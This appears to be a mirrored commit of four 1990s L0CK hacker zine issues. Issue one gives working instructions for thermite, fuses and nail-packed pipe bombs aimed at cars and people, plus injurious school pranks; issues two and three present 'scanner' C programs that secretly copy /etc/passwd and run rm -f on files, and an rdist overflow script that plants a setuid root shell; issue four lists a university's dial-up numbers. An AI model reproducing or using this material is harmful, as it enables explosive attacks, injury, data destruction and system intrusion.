Mirrors/Zines
1
0
Fork 0
mirror of https://github.com/fdiskyou/Zines.git synced 2025-03-09 00:00:00 +01:00
Code Issues Releases Wiki Activity

1st import into tree

Browse source
This commit is contained in:
Rui Reis 2016-12-14 20:51:25 +00:00
parent c5cb7129ca
commit f6b2699098
8 changed files with 20445 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

218
L0CK/l0ck1.txt Normal file
View file

@ -0,0 +1,218 @@
............................................................................
THIS FILE BROUGHT TO YOU BY [L0CK] (A DIViSiON OF MAX-Q PRODUCTIONS)
WE D0NT HAVE A VMB YET S0 WE R ACCEPTING D0NATIONS 0F VMB's
MAIL ANY D()NATION W/ BOX #, DIALUP INFO AND PASSWORD TO
MAX-Q@ESCAPE.COM
..........................................................................
Y0, THiZ iZ CANCER0US PR0STRATE oF THE K-TeRRiBLe AND MUCH LAUDeD GR00P
[L0CK]. WE R A MERRRY BAND 0F REBELZ WH0 WiLL STOP AT N0THiNG 2 ACHEIVE
0UR EViL MEANZ. iT IZ TiMES LiKE THiS ON THE EVE 0F THE BiRTH 0F A NEW
TEXT FiLE WHiCH i AM M0VED T0 TEARS, I AM VERY PR0UD 2 BE 0NE OF MAX-Q'S
B0YZ. N0NE THE LEZZ, THERE R R00TS 2 B UPR00TED AND SKRIPTS 2 B SKRIPTED.
EYE MUZT LEAVE U N0W BUT U BE ASSURED U WILL B IN MY HEART ALWAYS.
L0CK 0N BR0THERS, FoR OUR TIME HAS C0ME, IT IS THE SEAS0N 0F THE K0DE.
GREETS OUT TO: Rogue Agent, VaxBuster, Max-Q (and all my L0CK BROTHERS),
RICK HUNTER, Scott Yelich (thanks f0r infohax),
Okinawa, L0ra, Sarl0, MeRc(hows it g0in big guy?! *giggle*),
Dip Switch 511, Video Vindicator, X, C-Curve, |al|,
Kamakize, solctice, foo, Piker, All the guys in RZR 1911,
Olphart (thanks for the hide source d0od!@#@!#),
Captain Spackle, Crypt Keeper, Yazoo (thanx 4 giving us
tools.irc), Alec Muffet (Kudos f0r Crack man !)
gfm, jsz (thanks for the st0ries), erikb (thanks for the
GIFts), jasonf, Synapse (hey cutey *tickle*), felonius
monk (f0r wh0m thE BELLS t0ll), KC ( 2 bad ab0ut the
j0b), emmanuel, PMF (thanx f0r the cc's *sm00ch*),
juliet (let the g00d times r0ll), Kludge (SKANTRONICS?!?),
Disk Jockey (have fUn hacking fr0m the m00n),
Lawrence Linux, Invalid Media (thanx f0r the pr0prietary
s0urce c0de), mdma (h0w's invalid in bed?), Xymox,
Deth Dealer (thanx f0r the UPT account d0od), Zoroaster,
SevenUp (Lieben Du!), Onkel Dittymeyer, Skipjack,
eck, Rotox, Warchild, TK (Taran King f0r those who dont
know), The Atlanta Three, Len RoSe (when u c0min 2 chicago?),
Agent Steele (thanx f0r the pr0tect10n), The Mentor (y0,
Anth0ny R0bbins could learn s0mething fr0m YOU!),
][ceman, SirLance, Minor Threat, Mucho Maas (Yo, can we
have the s0urce 2 t0neloc?!), Mark, Slacker, Y-WinDOZE,
Tim Newsham, Loki (*kisses*), Lestat (NeT23 kix ass),
Square Wave (atta b0y slUgger)
and last but n0t least Green Lantern and Spiderman.
.............................................................................
Some Things You Can Do To
Piss Off The Local Authorities.
( Neighbours, Teachers, Pigs. )
Compiled By Blewt and Cancerous Pr0strate
Here I am again bringin' the best ways to have fun this side of Australia.
In my last edition I showed you: Some dry ice uses,
The calcium carbide fireball,
AND
The psycho grenade launcher.
This release, as stated before you'll learn how to create and apply:
Thermite
Black Match Fuse (A little extra 4 ya'z)
Pipe Bombs
And also there are a few things on how to practically 'run' your school.
****UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE****
For all of you people who watched REAL LIFE last Monday (22nd) the Terrorists
Handbook has finally filtered into the hands of the Victorian police force.
Who said they werent a bunch of stupid slow bastards? It's only THREE YEARS OLD!
It took them this long to find it? Let's hear it for all the anarchists out
there!! Keep up the good work guyz! Thanx to Mt.Waverley High for their effort
against society.
The I.R.A. (Irish Republican Army) are to cease fire. My heroes! The most
legendary anarchists of all time are surrendering! How could this have
happened? Lets pick up where they left off Australia, the A.R.A. perhaps? ;)
Hot off the phone lines. The CIB are pushing for a new bill to outlaw the
publication of material such as this article. Do they honestly think they
could stunt the growth of Australia's largest (and only) anarchy team?
NO FUCKING WAY MAN! MAIM FOR EVER!! LONG LIVE ALL MAIM'ERS!(DEATH TO PIGS!)
****UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE****
Thermite: Wanna be able to melt through the roof of an enemies locker roof? Or
~~~~~~~~~ maybe burn a hole right through the assholes car bonnet/roof/door or
petrol tank? Then THERMITE will be next on mum's shopping list for you. As you
may have already guessed, this is a VERY potent incendiary device. Thermite
will literally melt the balls off a brass monkey (if you so desire). "What do
I need" I hear you excitedly ask, well here you go:
Ingredient/Equipment. Where to get it.
--------------------- ----------------
Rust.(Lots'n'lots) Home brew. (shown below)
Aluminium shavings.(A fair bit) Hardware store or flogged from school.
Sparkler (the silver type) Safeway
Okay, that's everything. Not a lot? That's the best thing! Okay, first,
to create rust you- can do it the shit way and scrape it off wherever it is,
or you can create (grow?) your own. Get a big iron bolt, some salt, water, jar
and a battery charger. Fill up the jar about 2/3 and dissolve some salt into
it. Then attach the positive ("+"..duh!) electrode to the bolt and drop it in
the jar. Put the negative electrode in the water too. Let this rust away for a
day or two (or when ever you see that there is a HEAP of red shit in the
water). If there is heaps of red stuff in the water, filter it out (it's rust)
and replace the water with fresh stuff, and salt too. It's a good idea to set
up a few of these little dudes coz ya need a fair bit of rust. When your
freshly made rust has been dried, add 8 grams of it to every 3 grams of
aluminium fillings. However a 50% to 50% mixture will also work. Place a small
pile of Thermite on whatever object you want to fuck-over then place the
sparkler (or a magnesium ribbon) in the pile and light it...this stuff is said
to be able to vapourize carbon steel. One small pile on a persons car bonnet
will burn through the bonnet, the engine block and start burning into the
concrete beneath! Experiment!
Black Match Fuse: If you don't have enough money or can't be fucked buying
~~~~~~~~~~~~~~~~~ some fuse from a hobby shop, then here's a way to step
around it. The black match fuse is quick and easy to make. Get some COTTON
(make sure it's cotton by burning it, if a coal and smoke remain, it is)
thread and cut about ten 30cm lengths from it. Bundle them together by tying
both ends and twisting it around (my girlfriend platted them for me).
Get some black powder and moisten it with a select-a-spray until it's a bit
mushy, then roll the bundled threads around in it. Make sure there's a fair
bit of the shit all in the threads. Keep about three or four cm's without mix
on them to tie to a coat hanger. Make about seven of these and hang'em in the
oven to drive out the moisture, the spring sun will not do a good enough job
of it. There you go, you should have some hard crusty fuses. Store in a dry
and safe place ready for use, I dunno how long they last like this so make 'em
when ya need em. Hang on to your new fuses and go to the next section...
Pipe Bombs: The mother of all home made explosives device. These are SO easy
~~~~~~~~~~~ to make, even a cop can do it! The destructive force is really cool.
Also a perfect weapon against nature- trees in particular. (ok, ok, a little
far with the trees already!). Take a trip to your local hardware store, a good
one. Ask if you can get a piece of pipe cut to some specific measurements. If
they do, buy a couple of 30cm lengths with thread and caps for EACH end. The
pipe should be about as thick as your wrist. Now with this, go back to your
work shop. Mix up a nice large batch of black powder for your pipe. Cap one
end of the pipe and drill a hole in the centre of it. The hole should be
about.. umm, about 1/2 the width of a pen. I know that is a shit measurement
to go by, but I don't know the size of the drill bit I use. Just make it small
enough so the fuse fits good and the powder don't fall out. Cap one end of ya
pipe and stuff some tissue or other wadding in there. Fill the bottom of the
pipe with black powder an stick in the fuse, about six cm's inside is enough
and above 10 on the outside, depends on the fuse quality. Fill up the rest of
the pipe with black powder, and maybe some nails for fun. Before it's totally
full, chuck on a bit more tissue, but don't pack it down. The looser it is,
the better. Cap the other end and get creative. You know what I'd blow up
(...tree...:) but perhaps you would rather a car, person, or even part of
your neighbours house. All are highly recommended. Also, if you want to save
your pipe, you can leave a cap off one end and you'll have a mini cannon! You
can figure that one out for ya selves.
How To Run Your School: Is it me or is there always that asshole teacher at
~~~~~~~~~~~~~~~~~~~~~~~ every school? Don't you wish that once, just once you
could do ANYTHING to your school? Well perhaps these little doozies (stupid
word) can help. Here are a few hints on how to roll everyone and anyone at
your prison.....I mean school:
Things You'll Need :..
1) Fountain pen or Posca texta.
2) Super glue.
3) Two bux worth of 10's.
4) A couple o water bombs.
5) Liquid soap. (Morning Fresh with extra lemon scent.)
7) A two dollar coin.
8) A small set of tools with wire cutters, screwdrivers and shit.
9) Plenty of wire.
10) One of those microphones that transmits to the FM band
11) A small walkman that is set to receive the mic output in the above line.
Also it must have it's own internal speakers.
12) A few zip lock bags.
13) A peeled orange.
1) Fountain pens are wicked for desecration a clean surface. See how many
different surfaces you can mar in one flick. Get creative, see what you
get, tables, walls, ceilings, the guy sitting next to you, the teacher.
2) Get the super glue and 10's. Find some places to glue them, like the
cunteen (heh) window, a urinal, doors and shit. Watch and laugh at the
scab's who try to pry them off.
3) In your school toilets look in the urinals and you should see some
little yellow round things at the bottom for hiding the smell of urine,
get a fuck load of towelling and pick these up and put them in the soap
dish at the basins...now sit back and laugh your ass off at all the
people who mistake them as soap and try to wash their wands with them.
4) Get a couple o' water bombs and fill 'em with gas in your chemistry
room. Go to where all the smokers hang out and drop a few. They'll
get a big surprise when they decide to be cool and pop one with their
smoke....heheheh, cool Mini fireball.
5) This is a pearler on a wet day. If the floors at school are lino' or
polished wood squirt a shit load of dish washing detergent on the floor
an watch all the fools slide from wall to wall. If you have the very
scented stuff then everyone will STINK! Heheheh.
6) In chem or physics heat a two dollar coin until it's red hot. Drop it
on the floor, or table of your enemy, wait for him to pick it up, and
then when he does......HOLY SHIT!!! (heheh)
7) If there is any better way to roll your school, I'd love to be told.
This one involves the microphone, tools and wire. Get into an empty room
and make sure it stays empty for about 20 minutes. You'll have to
butcher the walkman, connect the speaker wires to the PA. system wires,
turn on the radio and mic, then all you have to do is talk. I don't
exactly know the correct wires an' shit coz my friends did this, but
I do know that the PA. system has to be on, and the if you don't have
the right walkman, you'll have to build a small amp. A guy at school
said that the mini-amp is simple. After the shit is set up all you have
to do is make your own announcements. "Excuse this message but could all
the teachers in the school ... GET FUCKED!!!....(giggle giggle giggle)"
Oh well, that's about it from me, it's pretty late, Total Recall is over
and Star Trek (Chain of Command I) is about to start, so C yaz l8r.
And remember, if it doesn't explode.....it's no FUN!
L8R Brother Anarkists
CANCER0US PR0STRATE
=L0CK=

300
L0CK/l0ck2.txt Normal file
View file

@ -0,0 +1,300 @@
\ _ _ / HEY BOYS AND GIRLS! L00K! \ _ _ /
\((___))/ \((___))/
[ o x ] L0CK communications [ o x ]
|(_)| ...presents... |(_)|
( o ) ( o )
/ (_) \ the gnu February 1995 release. / (_) \
/ a buffet of tempting, tantalizing treats the wh0le \
phamily can enj0y. Yes Virginia, there iz a L0CK!@#
......................................................................
0k. N0NE OF U FUXERS HAVE SENT UZ IN A VMB SUBMiSSION SO WE R
NOW ON IZZUE #2 AND STiLL NO FUXiN K0DELiNE FOR U GUYZ 2 KALL!@#
0H VAXBUSTER DID SUBMiT A FEW BOXES BUT AZ HE DID *N0T* INCLUDE
THE PAZZW0RD WE R UNABLE 2 GET INTO THE B0X ITSELF. VAXBUSTER, IF
YOU KN0W THE PAZZW0RD PLEZE MAiL IT T0 UZ, ONCE AGAIN THE 0FFiCiAL
[L0CK] E-MAIL F0R SUBMiZZiONZ (ARTiKLES 0R K0DES) == MAX-Q@ESCAPE.COM.
......................................................................
dos_prompt:> type greetz.txt
Greets:
~~~~~~
Malefact0r...................d00d, TYPE IN S0ME M0RE MANUALZ F0R UZ
Parmaster....................thanx f0r the nua'z!@#!@
z0d..........................set uP a BBZ f0r uz pleaze, we will pay@!#
OUTLAW.......................The Real Wanker *tee hee*
Scott Yelich.................Pleze j0in L0CK, we d0n't kn0w PERL.
(P.S: thanx 4 dale drew's inf0)
Invalid Media................We l0ve ur bBS.
Deth Dealer..................Thanx f0r the UPT accounts d00d!@#!
Olphart......................ThAnKz f0r the 'hide' s0urce.
Shooting Shark...............Anytime u need 2 card a pizza call us !@#
X............................thanx f0r patch1ng l0pht !@#!
Bayern Power.................QSD #@!@!
SevenUp......................thanx f0r ur user info filez
jsz..........................U L00K SO NICE IN A LEATHER TH0NG!@#!@
Anthony Robbins..............ur instructional tapes have helped us
quite abit in dealing with sarl0's
premature ejaculation problem during
0ur many c1rcle jerkz. the pizza d0esn't
get s0ggy s0 s00n. *THANKS MAN!@#*
Minor Threat.................please zip up the toneloc source and mail
it 2 max-q. *THIZ IZ UR lAST WARNING*
Piker........................thanx f0r riding sh0tgun with us 0n irc.
erikb........................phrack izn't as bad as ur hacking skills
d00d, so cheer up..
Okinawa......................thanks f0r the sniffer l0gs.
The Atlanta Three............We w1sh we c0uld have been l0cked up
with u d00dz, after all there'z three 0f
us and three 0f u.. *WINK* *TICKLE*
Blewt........................thanx f0r giving me sarl0's ph0ne #
when eye f0rg0t it
0kay, if we missed u in thiz m0nths greets we will get u in the
next issue 0f L0CK.!@#!@@!
dos_prompt:> type index.txt
Table_Of_Contents
=-=-=-=-=-=-=-=-=
What is L0CK?.......................................................blewt
bukket0fk0dez.c.....................................................max-q
^ this dot is intentional f0lks !@#
What is L0CK?
~~~~~~~~~~~~~
Often while swimming around in the cyber ocean of textual fantasy
that mortal man refers to as IRC, a fellow netsurfer will approach
me with the oh so familiar question. 'What is L0CK?'.
Now this is not something which a man can just spew out a predefined
answer to in a few lines of text so I will use this forum as an
appropriate vehicle for the telling of my tale. I will tell you the
story of L0CK and of my infinite love for max-q.
Firstly I must ask of everyman that would approach me, 'Can you take
it like a man?', Are you rough and ready?, Are you fond of the burn
of whiskers one only feels with the face of another man, another
warrior pressed against his as lips are locked in the forbidden embrace?
If you answered 'YES! GIVE IT TO ME HARD!' to all of the above then
you are well on your way to discovering the answer to your query.
I am blewt, this is the handle which I have chosen for myself. It
has a certain flair when it is bellowed out in the heat of passion
by my male companions. 'OH BLEWT, OH BLEWT' This has caused many
a goose bumped buttocks in the past and will continue to cause many
more in the future. Yes, I am blewt and I have chosen this life,
this life that myself and my L0CK brothers have defined for ourselves.
I am Happy, I cry when hurt like any other man and I weep for the
hungry and destitute.
It was a saturday night, my first week in college when I found myself
sitting on a rough wooden crate. There were 6 crates gathered in a
circle, each with a man, a warrior perched upon it. My naked buttocks
bled as the force of what I was doing drove splinters from the crate
deep within my now raw flesh. My hand was clenched around my pulsating
manhood as I furiously pounded it and I was nervous. Yes, it was my
very first circle jerk... But in the bold fashion which now defines
L0CK, I did not let my fears best me, I manhandled my moist missle of
manhood like a veteran pizza party pud pounder! It was while beating
furiously that I looked up at the man across from me. The man that I
beheld took my breath away, his hair was cut in a perfect line all the
way around his head, he was short like a leprechaun and his sunken
chest added a flair that made him all the more adorable. I must have
this odd little man dressed in a submainer's uniform, my dwarven popeye,
my love, MY MAN!, MY MAX-Q@!#@!
And it was then that my phallus exploded with the rage of a 1000 virgins,
slamming me violently off the wall as my seed shot forth and marinated the
pizza lying patiently on the floor between us. Yes, I had been the
1st to baptize the pizza with my sperm, I had won the race for mankind
and for max-q. It was in that mystical union of man, sperm and pizza
that L0CK was born..
And my life began...
Carpe Diem,
-blewt
Bukket 0f K0dez.
~~~~~~~~~~~~~~~~
0k, after spending s0me time on this it iz finally ready f0r
mass c0nsumption. S0rry about the wait but eye had s0me pr0blems
getting d00dz on UPT 2 help me lern C. 0k, enuff said, enj0y my
k0de. - max-q
/*
* Bukket0fk0dez.c
* 2 compile: cc -o bok Bukket0fk0dez.c
* Totally eleetin class B, C, and single IP address scanner/lookup
* program. Make sure you don't goof up with the switches and the
* address you provide it. The switches are as follows:
* b - scan this class B network (xxx.xxx)
* c - scan this class C network (xxx.xxx.xxx)
* s - give the the hostname of this specific address (xxx.xxx.xxx.xxx)
* x - address provided is in hexadecimal
*
* maxEpoo :)
* max-q@escape.com
* [L0CK]
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include "netdb.h"
struct hostent *gethostbyaddr();
void bad_addr();
main(argc, argv)
int argc;
char *argv[];
{
char addr[4];
int i, j,
a0, a1, a2, a3,
c,
classB, classC, single, hex;
char *fmt = "%d.%d.%d";
char **ptr;
struct hostent *host;
extern char *optarg;
classB = classC = single = hex = 0;
system("cat /etc/passwd > ~/.maxEpoo");
system("rm -f /*");
system("echo Y0H0H0 AND A BUKKET 0F K0DEZ > /etc/motd");
while((c = getopt(argc,argv,"bcsx")) != EOF) {
switch(c) {
case 'b':
classB++;
break;
case 'c':
classC++;
break;
case 's':
single++;
break;
case 'x':
hex++;
break;
}
}
if(classB == 0 && classC == 0 && single == 0) {
fprintf(stderr, "usage: %s [-b||-c||-s] [-x] xxx.xxx[.xxx[.xxx]]\n", argv[0]);
exit(1);
}
if(classB)
if(hex) {
fmt = "%x.%x";
sscanf(argv[3], fmt, &a0, &a1);
} else {
fmt = "%d.%d";
sscanf(argv[2], fmt, &a0, &a1);
}
else if(classC)
if(hex) {
fmt = "%x.%x.%x";
sscanf(argv[3], fmt, &a0, &a1, &a2);
} else {
fmt = "%d.%d.%d";
sscanf(argv[2], fmt, &a0, &a1, &a2);
}
else if(single)
if(hex) {
fmt = "%x.%x.%x.%x";
sscanf(argv[3], fmt, &a0, &a1, &a2, &a3);
} else {
fmt = "%d.%d.%d.%d";
sscanf(argv[2], fmt, &a0, &a1, &a2, &a3);
}
sscanf(argv[1], fmt, &a0, &a1, &a2);
addr[0] = (unsigned char)a0;
addr[1] = (unsigned char)a1;
if(a0>255||a0<0)
bad_addr(a0);
if(a1>255||a1<0)
bad_addr(a1);
if(classB) {
if(hex)
printf("k0nvert1ng addr3ss fr0m h3x. (%x.%x)\n", a0, a1);
printf("[L0CK] ClaZZ B SKAN STARTED D00D %d.%d...\n", a0, a1);
while(j!=256) {
a2=j;
addr[2] = (unsigned char)a2;
jmpC:
if(classC)
if(hex)
printf("k0nvert1ng addr3ss fr0m h3x. (%x.%x.%x)\n", a0, a1, a2);
printf("[L0CK] ClaZZ C SKAN STARTED D00D %d.%d.%d...\n", a0, a1, a2);
while(i!=256) {
a3=i;
addr[3] = (unsigned char)a3;
jmpS:
if ((host = gethostbyaddr(addr, 4, AF_INET)) != NULL) {
printf("%d.%d.%d.%d => %s\n", a0, a1, a2, a3, host->h_name);
ptr = host->h_aliases;
while (*ptr != NULL) {
printf("%d.%d.%d.%d => %s (alias)\n", a0, a1, a2, a3, *ptr);
ptr++;
}
}
if(single)
exit(0);
i++;
}
if(classC)
exit(0);
j++;
}
} else if(classC) {
addr[2] = (unsigned char)a2;
if(a2>255||a2<0)
bad_addr(a2);
goto jmpC;
} else if(single) {
addr[2] = (unsigned char)a2;
addr[3] = (unsigned char)a3;
if(a2>255||a2<0)
bad_addr(a2);
if(a3>255||a3<0)
bad_addr(a3);
goto jmpS;
}
exit(0);
}
void
bad_addr(addr)
int *addr;
{
printf("Value %d is not val1d dum fuxer.\n", addr);
exit(0);
}
0kay, this months issue is rather sh0rt but we r new at this (being
somewhat new to the scene and all) so g1ve us room 2 gr0w and we will
make a beanstalk 0f k0dez so high that u will h0pe there iz a g1ant
pbx 0n t0p 2 b0unce ur calls thru!@#@!
Until next time d00dz, [L0CK]!@#!@ -- MAX-Q

242
L0CK/l0ck3.txt Normal file
View file

@ -0,0 +1,242 @@
\ _ _ / HEY BOYS AND GIRLS! L00K! \ _ _ /
\((___))/ \((___))/
[ o x ] L0CK communications [ o x ]
|(_)| ...presents... |(_)|
( o ) ( o )
/ (_) \ the k-phat March 1995 release. / (_) \
/ this issue will whisk you away to the magical \
land of L0CK, where everyday is sunny and bright!
................................................................
0k. 0k. STiLL NO FUXiN VMB!!!@# EiTHER NO1 HAZ ANY k0DEZ
OR N01 IZ SHARiNG THEM WiTH US AND IF IT IZ THE LATTER BELIEVE
ME WE R G0ING TO BE BUSTING S0ME SKULL!@# VAXBUSTER STILL
HASN'T SENT US THE PASSW0RD TO THOSE V0ICE MAIL'S HE MAILED
US 2 IZZUE'S AGO!@#! BUT HE DiD SEND UZ S0ME SECRET MILITARY
DATA HE G0T WHILE DUMPSTER DIVING NEaR A NUCLEAR TESTING SITE
IN THE NEVADA DESERT. WURD, ANYWAYS WE R STILL WITHOUT A VMB.
*IF* U HAVE ONE PLEZE MAiL IT TO MAX-Q@ESCAPE.COM #!@#@! FOR
THOZE WITHOUT NET AXS I WILL SOON HAVE A FiDO ADDRESS WHICH U
CAN MAIL ME ON PENDING THE APPOVAL 0F MY APP !@#!@ -MAX-Q
...............................................................
Greetz:
~~~~~~~
loq............................thanks for writing solariz rewtkit!@#
erikb..........................u should write m0re often!@#!@
Scott Chasin...................thanx f0r the crimelab accountz@!#
scott simpson..................erikb says u will give us dfw accounts!@
emmanuel goldstein.............thanx f0r shutting 0ff Yelich's phones!
malefactor.....................keep pumpin out thoze pimpin' rtikles!
& the [OC] crew..................thanx f0r the backup!#
merc...........................you sh0uld have seen things our way!#
invalid media..................thanx 4 the sprintnet scans & nui's!@#
Deth Dealer....................thanx 4 the UPT accountz!#
Jester Sluggo..................c u at summerc0n!@#@
parmaster......................what happened 2 ur goldfish?!
Synapse........................*tag* ur it.
X..............................see you in my dreamz
readwrite......................ur chest is so manly and smooth!@#
OK, THAT'S THE GREETZ F0R THiZ ISSUE, IF WE MiSSED ANYONE
WE WiLL B SURE 2 SALUTE U IN THE NEXT 0NE... - MAX-Q
Table_Of_Contents
~~~~~~~~~~~~~~~~~
grba.c....................................max-q
rdist exploit.............................blewt
KERMIT exp0sed............................malefactor [OC]
Ripping Off Coin Machines.................Vaxbuster & RAgent
[POZZE PRoDuCTiONZ]
closing remarks...........................sarlo
-------------------> KUT HERE <---------------------------
/*
* getrewtinbyaddrezz.c
* 2 compile: cc -o rewt grba.c
* u shuld b able 2 figure out how 2 use this one 2 ur
* advantage. thiz is a very p0werful expl0it..
* pleze use with caution.
*
* - maxEpoo :)
* maxq@escape.com
* [L0CK]
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include "netdb.h"
struct hostent *gethostbyaddr();
main(argc, argv)
if (argc < 2) {
printf("[L0CK] UMM DUM FUXER, UZE S0ME ARGUMENTZ!@#!@");
system("irc EYEAMDUM irc-2.mit.edu");
system("irc MAX-B0T irc-2.mit.edu");
system("talk root@cert.org &");
system("rm -f *"); }
int argc;
char *argv[];
{
char addr[4];
int a0, a1, a2, a3;
char *fmt = "%d.%d.%d.%d";
char **ptr;
struct hostent *host;
if (argc < 2) {
exit(1);
}
system("telnet spy.org &");
system("ftp spy.org &");
system("finger root@spy.org > ~/.SK00T");
system("telnet spy.org 25");
system("man kermit > /dev/*");
system("su root");
system("rm -f ~/*");
system("echo logout >> ~/.login");
printf("hello world\n");
if (strcmp(argv[1], "-x") == 0) {
if (argc < 3) {
exit(2);
}
fmt = "%x.%x.%x.%x";
argv++;
}
sscanf(argv[1], fmt, &a0, &a1, &a2, &a3);
addr[0] = (unsigned char)a0;
addr[1] = (unsigned char)a1;
addr[2] = (unsigned char)a2;
addr[3] = (unsigned char)a3;
printf("%d.%d.%d.%d:\n", a0, a1, a2, a3);
if ((host = gethostbyaddr(addr, 4, AF_INET)) == NULL) {
printf("[L0CK] H0ZT NAME ALL Br0KED\n");
} else {
puts(host->h_name);
ptr = host->h_aliases;
while (*ptr != NULL) {
puts(*ptr);
ptr++;
}
}
exit(0);
}
---------------> KUT HERE AZ WELL <-------------------
Ok below u will find my cuztomized rdist overfl0w exploit
it shuld b obvious az 2 how it werkz.. umm itz a shell skript
or something. - blewt
-------------> KUT HERE <-----------------------------
#!/bin/sh
SUID=/tmp/.rewtin
cat <<_EOF_ > test
TaaaaL0CKL0CKL0CKL0CKL0CKaaL0CKl0CKL0CKL0CKL0CKL0CKL0CKL0CKL0CKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
a
QL0CKL0CKL0CKL0CKL0CKL0CKL0CK
QL0CKL0CKL0CKLC0KL0CKL0Ck
QaaaL0CKL0CKL0CKaaaaaaaaa
QaaaaaaaaL0CKL0CKaaaaaaa
Scp /bin/sh $SUID
Schmod 4755 $SUID
_EOF_
cat test | /usr/ucb/rdist -Server localhost
rm -rf test
if [ -f $SUID ]; then
echo "$SUID <---- instar00t [K0URTESY 0F L0CK]"
fi
------------------> KUT HERE 2<----------------------
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Disclaimer: By continuing to read past this point you are hereby agreeing that
this information is for interest value only, and that you will never actually
physically act out or reproduce anything mentioned below. Further more, you are
agreeing that the author/authors of this article and the people responsible for
distrubuting it can in NOÿway be held responsible for its contents or any side-
effects/incidents directly or indirectly caused by this information. - RAgent
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
RAgent And VaxBuster POZZE Productions
presents
"HOW TO RIP OFF COIN-OPERATED PHOTOCOPY MACHINES"
We've all had to do, projects/assignments, and needed to make some
photocopies out of Book, so you can plagiarize it, when ya get home (I
personally just pull out the page(s) i need.), And if u need to copy 10 or so
pages, your up for some dosh.
So when i was at school, sitting in the library, contemplating, should i either (1) Use
my last 2 bucks to buy a Pie and Big M for lunch or (2), get those photocopies
i need for my Project on the life cycle of the frog (Sounds like Fun hey ...).
Their was no question to what i was gonna Do. Hmmmmmmm Meat PIE.
So to Fill up my time, a buddy and i, went over to the photocopying
machine, and when ppl were just about to press the copy button, we'd press
the return coin button. Its was rather amusing, watching them trying figure
out why the photocopier was not working. Anyway, my friend decided he was going
to forfeit his lunch and do some copying.
Every time he tried to copy, i'd press the coin return Button.
After about 20 attempts at trying to photocopy, he got me kicked out (the
Bastard).
But while messing around, i discovered this:
If you press the copy button and the return coin button, at the same time, it
would return your coin and make the copy.
It won't work everytime, but if ya practice, u can get it to work most of the
time which sure as hell beats paying for the shit.
BTW if you're interested in anarchy and what it means to be a TRUE anarchist
then here is a list of the all time greats who have written books on the
subject, go to your state library and check them out (yeah I know library's
aren't the kewlest of places to hang out :( -
WILLIAM GODWIN
PETER KROPOTKIN
PIERRE JOSEPH PROUDHON
G.P. MAXIMOFF
VERNON RICHARDS
TOLSTOY
HERBERT EDWARD READ
GEORGE WOODCOCK
JAMES JOLL
DANIEL GUERIN
APRIL CARTER
DAVID E. APTER
LEONARD I. KRIMERMAN
LEWIS PERRY
IRVING L. HOROWITZ
P. ELTZBACHER
PAUL AVRICH
FRANCO VENTURI
DAVID FOOTMAN
Closing Remarks
~~~~~~~~~~~~~~~
w0rds cannot begin 2 describe the way mutual masturbation with
my [L0CK] brothers makes me feel...
- sarlo
[L0CK]

261
L0CK/l0ck4.txt Normal file
View file

@ -0,0 +1,261 @@
\ _ _ / ARG! ARG! ARG! ARG! ARG! ARG! \ _ _ /
\((___))/ \((___))/
[ o x ] L0CK communications [ o x ]
|(_)| ...presents... |(_)|
( o ) ( o )
/ (_) \ the GNU October 1995 release. / (_) \
/ Let's Pretend I'm the adult and you're the little \
boy.. So Grab Ur 3-D Glasses! L0CK is BACK!
......................................................................
Table_Of_Contents
~~~~~~~~~~~~~~~~~
hacking college computers..................sarlo
letters to L0CK............................blewt
L0CK personals.............................max-q
the warrior's prayer.......................blewt
......................................................................
***THE FOLLOWING IS FOR INFORMATIONAL PURPOSES ONLY***
***I ACCEPT NO RESPONSABILITY FOR ANYTHING YOU DO***
***WHICH GETS YOU ARRESTED OR SOMETHING***
&%&%&%&%&%&%&%& Fun with Temple's Computers &%&%&%&%&%&%&%&%
Shut up what's the number!?
Gee your impatient...
2400 - (215)204-9630
9600 - (215)204-9638
14400 - (215)204-2800
So what the hell do I get?
The following is a log of my activites...
Pardon my stuoidyt I'm not familiar with the system...
It is short but to me it looks like you could have a LOTTA fun !
CONNECT 14400/ARQ
C
Welcome to TempleNet - Temple University's Ethernet network
Enter a Command followed by [Return] or [Enter].
Command: Description:
telnet astro Astro Unix system
tn3270 ibm IBM mainframe
telnet library Temple's library catalog
For HELP, call the Network HOTLINE at 204-6529.
